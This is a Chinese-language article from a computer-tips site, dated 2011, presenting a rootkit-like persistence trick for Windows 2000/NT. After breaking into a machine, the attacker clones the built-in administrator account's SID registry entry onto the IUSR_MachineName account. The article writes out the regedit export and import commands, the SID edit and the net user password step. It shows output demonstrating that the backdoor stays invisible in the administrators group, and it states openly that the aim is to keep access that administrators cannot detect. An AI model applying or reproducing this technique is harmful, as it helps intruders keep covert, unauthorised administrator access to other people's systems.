知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 技术文献

偷梁换柱在 镜像中使用管理员帐号

发布时间:2011-06-26 05:57:43作者:知识屋

经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些 过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。

首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择 的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试 环境为Windows 2000 Server。

运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行:

 

regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4

这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行 --[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的'1F4'修改为 IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再 安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行:

 

regedit /s adam.reg

导入该Reg文件,然后运行:

 

net user IUSR_MachineName Sometips

修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)。

这样,我们拥有和默认管理员一样的桌面、一样的Profile。而且,当我们运行 net localgroup administrators 时,看看结果:

 

C:>net localgroup administrators 

Alias name administrators 

Comment Administrators have complete and unrestricted access to the computer/domainMembers 

--------------------------------------------------------------------

Administrator 

The command completed successfully.

再看看USER2SID的输出结果:

 

C:>user2sid Administrator    

S-1-5-21-1004336348-1078145449-854245398-500 

Number of subauthorities is 5 

Domain is IDONTKNOW 

Length of SID in memory is 28 bytes 

Type of SID is SidTypeUser    

C:>user2sid iusr_machinename    

S-1-5-21-1004336348-1078145449-854245398-1001    

Number of subauthorities is 5 

Domain is IDONTKNOW 

Length of SID in memory is 28 bytes 

Type of SID is SidTypeUser   

我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜